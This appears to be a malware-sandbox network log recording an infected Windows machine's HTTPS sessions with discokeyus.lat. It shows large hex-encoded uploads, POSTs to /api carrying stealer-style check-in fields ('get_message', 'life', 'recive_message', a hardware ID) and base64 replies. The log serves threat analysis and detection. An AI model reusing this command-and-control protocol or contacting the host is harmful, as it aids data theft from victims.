                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: aa 7d 25 69 f9 3f ca e0 66 5d e1 d4 42 48 00 0a e4 38 05 3e 8e f3 25 0a a3 57 8a c1 62 67 46 6a 7a 84 30 36 b5 7d f5 b2 20 4e 7e 36 f6 b6 1c 1b e9 44 a6 e5 c3 70 a4 12 41 d7 5e 10 21 ad 6a 14 f9 3b 21 91 66 df 77 19 7a 9b bd 3d e8 30 c4 49 ef b0 45 9b 1e 28 f7 30 b3 35 83 04 fd 64 47 ba a8 b1 91 17 be cd bf 47 c5 d7 61 31 10 f8 74 7a 5f 91 26 9e 20 48 f2 c2 49 0b b9 49 52 0d e0 22 47 20 1d 05 bf 59 3d f3 32 90 df 24 f7 bf 24 79 aa a1 71 61 6f 52 d7 9f d3 06 97 bd e7 cb ff 9d fd 74 a0 b1 b2 ad e8 25 ab 02 65 5b 28 46 e8 d9 bf 98 87 9a ff 6b a3 ff c9 7f 51 8c aa bd c9 6d 43 e4 b5 c7 6b e7 f0 20 c3 fb 75 95 6b 46 53 4b 9e 05 b9 23 33 d0 29 ca 5c 33 79 e7 98 c3 fb 88 51 df 43 92 5d 7f 4f b2 29 9c ab a0 54 df 70 e7 fb ee eb 71 a5 7e 9a e7 5e 55 f1 ae bb 3c 79
                                                                                                                                                                                                                                                                          Data Ascii: }%i?f]BH8>%WbgFjz06} N~6DpA^!j;!fwz=0IE(05dGGa1tz_& HIIR"G Y=2$$yqaoRt%e[(FkQmCk ukFSK#3)\3yQC]O)Tpq~^U<y
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: f8 56 ca 6f 5b 8d 8f d1 65 d2 f1 c9 54 df c5 f7 48 b5 13 66 89 e9 09 41 73 67 88 c4 53 71 f3 b0 61 f4 08 f6 84 1f 81 8a 7e dd 3c 95 6c 37 8d 2e 8b 8d 9e 30 81 be ed 8f 0b 97 a3 9d d6 25 0e b7 66 f6 f1 77 a1 ee 73 d6 21 bb 5f fd d1 70 ea d3 71 b0 09 e7 78 87 47 f0 60 86 9a 66 ef 8f dc 4b d8 54 cc 7d b2 56 af 43 3e f5 0d 7f 59 16 cb b5 28 d5 3d 2e a0 8a a6 9c 5a cc 33 44 2e 3e 76 77 20 55 48 04 9c cb b5 8c c0 7f 2e 0d bc a0 1b e6 7c 23 3f da 27 51 c0 8d 4b 2a 7f c3 73 6a dd 7d d8 90 bc 72 c5 21 e4 d5 cf d5 9a ad ba 4f e3 e3 74 7c 4b 21 4f 84 0a 9d 8b cd 50 88 78 89 a4 9f 4e 5d a1 c4 a8 54 ca ce 9f 3f b4 8e c3 27 0d 34 84 4a 6f 3d 32 e4 56 8b c1 aa f5 87 57 32 9d 87 84 8d df 52 1e 31 f8 27 a6 fc 0a ba b6 02 9d 78 75 c7 73 f5 c1 3e d7 fc 96 ee 19 99 73 1f 4c
                                                                                                                                                                                                                                                                          Data Ascii: Vo[eTHfAsgSqa~<l7.0%fws!_pqxG`fKT}VC>Y(=.Z3D.>vw UH.|#?'QK*sj}r!Ot|K!OPxN]T?'4Jo=2VW2R1'xus>sL
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: fa 5d ac 2a 2f 47 95 5b e7 e4 98 da cc ff 26 17 ec 69 f7 32 c2 43 bf fb d3 5b 4a 02 5d a5 e3 83 1b ec 12 b8 73 ad 6f 9e a1 35 5c 09 b9 17 9a 3e 7f ab 5d f5 cd 1d 43 3b 01 b9 77 3f 12 9a 4f 26 23 bd 0a 88 6a 63 47 23 d4 b2 12 e2 2a 44 c7 a1 55 81 f5 63 f3 3f 5c d5 6e b2 6e 1d c3 be 21 26 ba b8 19 2d 6a 19 1f a5 4f f1 31 75 a1 db 19 bb 70 19 ca 0f d6 97 57 7c 64 1e 9e 8e 6f 60 a7 54 4a ce 14 5b 85 f4 28 49 14 7e 8b 76 c6 4e 26 47 fc 88 2f 90 7e e3 c5 31 3d 4b 17 66 bd d7 83 97 de cc 7a d1 49 ec bd 81 3b 07 c3 88 97 fe 6f 94 0d de b4 fe bf a1 96 00 6c 76 8c 5f ff 07 28 11 f7 f6 0e 84 aa 70 4a 08 83 7d a8 88 db e0 1e 07 18 a7 56 9e 83 48 73 bf cc c2 dc 52 10 74 85 06 92 2a c0 7d e0 07 e0 08 03 09 22 8a 45 c3 c8 47 30 bc 56 8c e8 2f b8 13 1c 5d 86 5e 8e af 37
                                                                                                                                                                                                                                                                          Data Ascii: ]*/G[&i2C[J]so5\>]C;w?O&#jcG#*DUc?\nn!&-jO1upW|do`TJ[(I~vN&G/~1=KfzI;olv_(pJ}VHsRt*}"EG0V/]^7
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: 9a 17 d5 c2 d0 9e e9 4d e4 61 11 f5 80 16 da f3 8e 5a a3 53 4f d9 12 4b b5 30 07 d9 f3 55 13 79 09 1a aa bd 6b fd 2d 99 c8 68 7e 0e 08 7f 13 ba 33 10 6c b1 c3 43 9f f0 3f 59 76 af 02 67 b0 54 f7 64 a9 a4 41 7a f1 55 3c 58 14 9b 71 f4 62 1b cc ea f9 ea e7 b3 3e 55 85 f4 b3 bf de 9d 53 4d 6d 9e 35 58 a9 11 f8 1a ef af 04 b4 0d 00 89 83 d5 13 48 bd 3c c5 24 d2 89 05 1c 1f bb d5 f4 dd 7a 94 ce 79 71 8c 97 22 b9 33 18 95 d9 86 64 f2 0f 5e 2c 08 f8 19 ab 28 06 cd 8b 21 d6 67 70 fb f6 ee 4e 7c 83 23 21 0d 22 a9 e2 bc be 00 bc cc fd 8a 0f 5d 12 94 27 30 87 83 86 71 7b a7 8c 9b 88 74 79 88 1e 7a 93 83 8f 1b f6 ee a5 3b cf d0 ef e0 f1 27 60 db 50 08 03 af 0d 1b 14 d0 f3 40 ca ee d4 65 9e db 35 a6 2b 00 73 6c 92 16 d2 d2 28 dd 20 93 c6 ef 4d 32 0d 33 71 93 fc 73 e9
                                                                                                                                                                                                                                                                          Data Ascii: MaZSOK0Uyk-h~3lC?YvgTdAzU<Xqb>USMm5XH<$zyq"3d^,(!gpN|#!"]'0q{tyz;'`P@e5+sl( M23qs
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: 54 4a cc 71 c2 06 6b 7e 20 43 87 69 f4 40 5f 67 cb 4b 4a ad 71 3d d9 ef 49 96 25 e4 d6 14 94 da b6 73 19 c2 ca 67 95 33 bd 8a 0a eb 6a f7 9a 56 f6 1b 93 12 a5 2a 5a fc 79 36 8d 16 88 a6 b7 b9 a1 62 6c 43 b5 71 7c 96 69 1c c4 c7 4d c7 32 c2 2b 0a 60 83 44 d6 45 b3 ac 68 dd a6 88 e2 b9 7a 1d d4 07 45 2b 28 ab 1c a3 4d 4c fe ad c0 c3 cb 8d 85 50 a2 13 0e 85 98 54 f1 68 8a 24 a6 c4 33 90 d1 b9 ee 2e 13 a5 61 cb 77 20 53 75 c3 5c b1 3a 36 2c 90 bd 3c ac 83 0a e3 82 bf 8c 44 56 20 61 d5 b9 61 f1 1d e2 a4 eb a3 99 1b d9 72 43 25 8d dc f4 6d fa 62 d2 03 59 7d c9 9d a9 78 62 da 85 25 7a 31 65 b9 e0 65 6f d5 68 65 0e eb e1 be 73 3b d6 c4 7b 33 23 f6 72 dd 05 7f b2 e3 7f 8c 55 39 9b 85 c7 f3 83 f5 b9 c1 df db 2f 4d 94 29 7f d7 d5 f8 9a 76 3e 72 4d 92 0d 63 fc 3b 45
                                                                                                                                                                                                                                                                          Data Ascii: TJqk~ Ci@_gKJq=I%sg3jV*Zy6blCq|iM2+`DEhzE+(MLPTh$3.aw Su\:6,<DV aarC%mbY}xb%z1eeohes;{3#rU9/M)v>rMc;E
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: f8 4d f8 c7 d0 e3 65 c5 19 61 5e db e6 cc 20 ec 25 cb cb b5 eb 74 a7 3d c7 5f 17 a1 15 1b 06 7e 53 8b ff a9 ca 46 cb c1 81 70 d8 7d 86 d0 c4 bb 5c cb d1 2c 34 1c 9a 12 36 a3 d0 a0 1f f9 d6 48 37 2e 9c 67 16 6c cd 2c 96 bf 44 31 a7 c4 f6 d2 be 7e c3 5e 91 d6 c2 88 7c 7c 60 5f d8 14 34 af 47 8c 8b e1 a8 55 ea 3b 73 83 c4 a0 45 07 b3 17 e9 da 09 41 ac b4 fe 01 8a d8 f0 cf df 11 bd 65 94 e2 c5 75 ee c3 1a 8d bf b3 f1 78 da 83 e4 a4 7d f2 b1 81 e3 b2 17 c7 78 fa 9a fb 0a 4d 43 44 e7 6c a0 93 03 87 bc 26 05 ce aa 00 94 5f cc ec c2 2f 5f 71 85 d8 7a d1 76 41 ae 43 12 ad ef 53 02 b4 a7 db 33 7c 40 42 59 bc df b6 49 aa f8 c2 b8 57 cd 77 9d 57 f9 f8 5e 2c 38 37 61 e8 11 1f 36 63 fc f5 62 e6 ce f6 1f a1 b6 36 e9 7f d2 a1 09 e8 a5 60 8e e0 82 20 18 3b d5 67 96 63 76
                                                                                                                                                                                                                                                                          Data Ascii: Mea^ %t=_~SFp}\,46H7.gl,D1~^||`_4GU;sEAeux}xMCDl&_/_qzvACS3|@BYIWwW^,87a6cb6` ;gcv
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: 5b 5a 46 99 dd 15 d1 3b 73 14 a9 7e e7 e0 07 33 05 91 65 21 8d b1 d2 f6 64 3c 66 31 f9 0b d6 18 66 ef 4a 85 0b da 84 9b 71 45 96 75 c6 51 e6 ce 62 cf 7f 3d 89 12 e1 5f 07 f6 13 22 bb f0 47 27 b6 74 e6 1e 5a e3 04 49 31 32 a1 84 d8 98 f0 46 a3 88 ee cc 21 7f 48 36 77 6d 13 5e 91 24 e8 b7 9a 7d f7 de 1b f9 23 0a 3c 85 e0 ff d7 fc 21 f1 31 7e 9e 08 ca 47 51 b7 1d df 3e 89 c7 df 97 3c a9 19 f5 47 e0 e1 f9 21 93 de 3e b5 f7 13 d3 e9 93 23 31 da 0f 3a 47 99 94 f8 d7 f0 4d b4 6f ea 40 6b eb 84 15 1e 5e 42 89 8c 89 86 d9 6d 95 ec df b3 b7 5f 6a 8f 44 f6 c2 52 e2 d9 d1 86 d5 74 0d 3f 13 6b 4a 1e 1a c8 3d 15 07 f6 1e b5 0f a8 e4 00 71 70 23 ea e6 ea 49 ec d1 69 b9 4d ea 50 57 ad 02 66 9b 10 8e b2 b0 79 7d b5 f4 00 ee a3 35 de 5e 34 24 c8 16 07 f7 cc 82 12 df 20 38
                                                                                                                                                                                                                                                                          Data Ascii: [ZF;s~3e!d<f1fJqEuQb=_"G'tZI12F!H6wm^$}#<!1~GQ><G!>#1:GMo@k^Bm_jDRt?kJ=qp#IiMPWfy}5^4$ 8
                                                                                                                                                                                                                                                                          2024-12-21 00:16:26 UTC15331OUTData Raw: 55 5b 01 e1 f2 6c be 33 6c 45 03 a3 09 3a 1d 75 2c 32 a0 16 33 8c 02 a9 b6 f1 74 32 27 93 67 2a 8a 69 3a ae 22 b5 b9 a8 b0 15 be fb 79 ed 8c 8b ea fc 67 ae ef 0e 0b f3 46 aa 30 64 ee 1a d1 b2 a6 37 b2 3b b5 8b 25 d1 3a f2 0c 4e d9 15 b4 2e 29 d6 2b c7 58 c9 44 5e c3 d0 33 a3 cc fb a5 25 ae 0f d4 59 a2 f0 6d c6 60 4a 04 3e 5b 7a fc 7c 91 5d 99 84 ef d1 1f f4 2a cf d0 84 bb 90 99 16 fa 29 b9 13 92 0b 2f 97 ed 16 20 73 d3 61 6e aa 14 b5 d6 1f 26 8b af e0 a2 fa 7b 5b 84 dc 6b 9a 99 2b 61 31 77 f6 8f 3c bb b3 0e 85 f7 a6 e1 07 a2 a6 27 73 3d 7c fb 69 56 13 58 f5 cc 79 ad d9 8e af 25 8d 71 e5 71 0b f0 1d 3b 80 a0 fa 64 20 f2 95 98 7c 9d 4c 8d c5 93 8f ce d7 aa 8d ed 04 17 be 21 35 68 80 62 1a 1d 64 aa a7 a4 72 98 78 95 42 2e df 46 2a 0a 6e 67 12 d8 ee 13 e6 6b
                                                                                                                                                                                                                                                                          Data Ascii: U[l3lE:u,23t2'g*i:"ygF0d7;%:N.)+XD^3%Ym`J>[z|]*)/ san&{[k+a1w<'s=|iVXy%qq;d |L!5hbdrxB.F*ngk
                                                                                                                                                                                                                                                                          2024-12-21 00:16:29 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=35leohd4ssq14jid6lpfpkihf5; expires=Tue, 15 Apr 2025 18:03:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPYo%2Bbe3hyfnkLOCKOZdL549KPP%2BhTg3zKQUbw5XqM11T0%2BNFZbAUYA2OURr0BjsEgsNW8emIscRbwN1IciqXSlpLXga2Ej42JV89dtEiQ6ZfiVCtJGSmuYz4m5ell55VQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53aef71b060c76-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1486&rtt_var=581&sent=317&recv=579&lost=0&retrans=0&sent_bytes=2831&recv_bytes=554515&delivery_rate=1843434&cwnd=151&unsent_bytes=0&cid=1b7b305b74ba6ac2&ts=3305&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          51192.168.2.550225172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:31 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:31 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=80E12067200E3E98AC8923850305D13E
                                                                                                                                                                                                                                                                          2024-12-21 00:16:31 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=s56f0q9djh3puj031k66knfri1; expires=Tue, 15 Apr 2025 18:03:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHLGCieKTB5Cc8iT5e7zc0CvbOlNjo1inuHmxgAg1KOziAaRuHc2hxEe2l3LzReT53TAO%2FPq6hOkkhTmoPRq%2Bgh8ttWknBWoRqs2s%2FLCM1p7XkIBDyjsiCdviBotqKsbXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53af1458784313-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1599&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=980&delivery_rate=1734997&cwnd=252&unsent_bytes=0&cid=b06937608377ef7b&ts=641&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:31 UTC214INData Raw: 64 30 0d 0a 42 32 30 4c 36 6e 73 31 55 6c 4e 56 5a 32 6d 6b 32 4a 2b 6c 6e 53 58 6c 4c 52 6c 32 6c 61 56 49 65 6c 4a 61 51 59 6a 43 30 4b 46 63 46 69 6d 66 57 51 39 77 4f 79 45 54 47 5a 36 45 73 50 6d 79 46 4e 30 59 4e 30 53 6b 6b 47 5a 4c 59 32 6c 76 75 66 53 4d 6a 6d 67 4c 62 62 5a 55 55 54 63 31 65 77 49 52 77 66 71 7a 68 2f 74 52 78 78 63 70 57 72 66 41 61 6b 42 69 4a 32 33 7a 34 4b 57 44 50 55 39 6a 6e 67 39 46 61 41 39 36 4f 30 61 56 34 4b 71 4c 72 78 54 51 41 79 68 48 70 6f 74 35 54 41 35 31 4d 76 79 6e 73 63 78 62 51 6e 6d 4c 46 56 45 39 50 6e 73 43 45 63 48 36 73 34 66 37 55 63 63 58 4b 56 71 33 77 47 70 41 59 69 63 63 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: d0B20L6ns1UlNVZ2mk2J+lnSXlLRl2laVIelJaQYjC0KFcFimfWQ9wOyETGZ6EsPmyFN0YN0SkkGZLY2lvufSMjmgLbbZUUTc1ewIRwfqzh/tRxxcpWrfAakBiJ23z4KWDPU9jng9FaA96O0aV4KqLrxTQAyhHpot5TA51MvynscxbQnmLFVE9PnsCEcH6s4f7UccXKVq3wGpAYicc
                                                                                                                                                                                                                                                                          2024-12-21 00:16:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          52192.168.2.550266172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:42 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                                          2024-12-21 00:16:43 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=j5v8322aru4rmp28uoquele9ve; expires=Tue, 15 Apr 2025 18:03:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MO3PyhOvAubRSdbWnu%2BmxhtK29jg3YZ12rxKu7od0GPZIDjHyNDlOINwx643HA%2BV2jDAXWSQK0ZInFMDjBfJZyqINwV4wwrbZdLV57iy6CgoTOx%2FLeJDkuNYRUuzwDX1eQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53af5dbff77cae-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1802&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1584373&cwnd=195&unsent_bytes=0&cid=14574b8c2c2883b6&ts=839&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:43 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                                          2024-12-21 00:16:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          53192.168.2.550274172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:44 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 47
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:44 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:45 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hang79f0degabcephpq1vs1n5o; expires=Tue, 15 Apr 2025 18:03:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=naxUx%2FmLrpGHXnVhlNi%2B8%2Fn7w9ZUYUY2zkSb%2BS1PUqJikQef2fzrPW%2FIeXgiUUM7e0DR9IQG76vbnf6tPmoYT06aROEEuDRB7wNCJbZxeC5mj1rIz9VUrba6TOATqkASfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53af6a4cceef9f-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2014&rtt_var=777&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1449851&cwnd=216&unsent_bytes=0&cid=a06403397f967383&ts=791&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC240INData Raw: 34 36 65 0d 0a 78 55 7a 69 4d 43 63 6f 56 62 4b 30 54 73 70 32 6f 71 43 6e 59 74 7a 78 67 70 36 4f 66 50 45 4a 77 2f 39 6f 37 37 59 50 53 75 53 2b 62 70 51 53 48 52 78 35 6b 4d 63 72 36 45 7a 57 30 74 49 48 38 4e 50 6a 2b 71 78 47 6c 32 69 76 6a 41 33 44 6c 48 6b 6e 78 76 38 71 67 31 78 55 54 58 6d 51 30 54 62 6f 54 50 6e 62 68 51 65 79 30 37 69 38 36 78 61 54 61 4b 2b 64 43 59 54 5a 66 79 61 48 72 53 43 46 57 45 4a 4c 4d 64 50 59 49 36 38 54 78 38 48 4e 44 4c 57 63 36 76 4f 73 55 4e 4e 73 75 64 31 53 7a 66 74 71 50 6f 57 49 4c 5a 46 62 42 56 56 35 79 5a 59 72 70 46 53 59 67 73 59 48 76 70 33 6b 2b 75 55 55 6d 57 47 6e 6e 41 79 46 78 6d 59 73 6a 4b 30 75 68 6c 6c 49 51 69 58 65 30 69 53 6b 46 63 33 42 68 55 37
                                                                                                                                                                                                                                                                          Data Ascii: 46exUziMCcoVbK0Tsp2oqCnYtzxgp6OfPEJw/9o77YPSuS+bpQSHRx5kMcr6EzW0tIH8NPj+qxGl2ivjA3DlHknxv8qg1xUTXmQ0TboTPnbhQey07i86xaTaK+dCYTZfyaHrSCFWEJLMdPYI68Tx8HNDLWc6vOsUNNsud1SzftqPoWILZFbBVV5yZYrpFSYgsYHvp3k+uUUmWGnnAyFxmYsjK0uhllIQiXe0iSkFc3BhU7
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC901INData Raw: 2b 6c 50 69 38 74 46 37 41 57 61 4b 4d 47 35 6a 5a 66 53 37 47 75 47 43 5a 45 6b 4a 47 64 34 69 57 4a 4b 51 61 78 63 48 4b 42 37 2b 54 38 76 50 73 48 5a 74 6a 70 5a 63 46 67 74 74 6a 49 6f 47 76 4a 34 64 64 51 6b 49 78 33 39 56 73 35 6c 54 48 32 6f 56 59 2f 72 50 77 2f 2b 38 4b 6e 6e 72 68 67 6b 53 55 6c 47 6f 6b 78 76 39 75 68 6c 78 45 52 7a 66 43 33 69 65 6a 45 64 4c 4a 7a 41 32 7a 6b 2b 33 32 34 78 32 54 62 4b 75 58 42 59 66 51 59 43 57 41 70 79 37 41 48 41 56 4e 4c 35 43 4f 62 49 73 52 30 4d 58 4a 46 76 79 70 6f 4f 4f 69 42 39 4e 73 72 64 31 53 7a 64 78 6f 4b 34 57 73 49 59 4e 61 54 6c 67 33 77 74 41 68 72 51 62 47 78 38 73 4b 76 59 48 71 38 75 6f 64 6d 6d 43 6f 6d 41 32 4a 6c 43 4e 6f 67 62 39 75 32 42 4a 6b 52 7a 7a 63 33 44 75 6f 56 4e 2b 4d 33 45
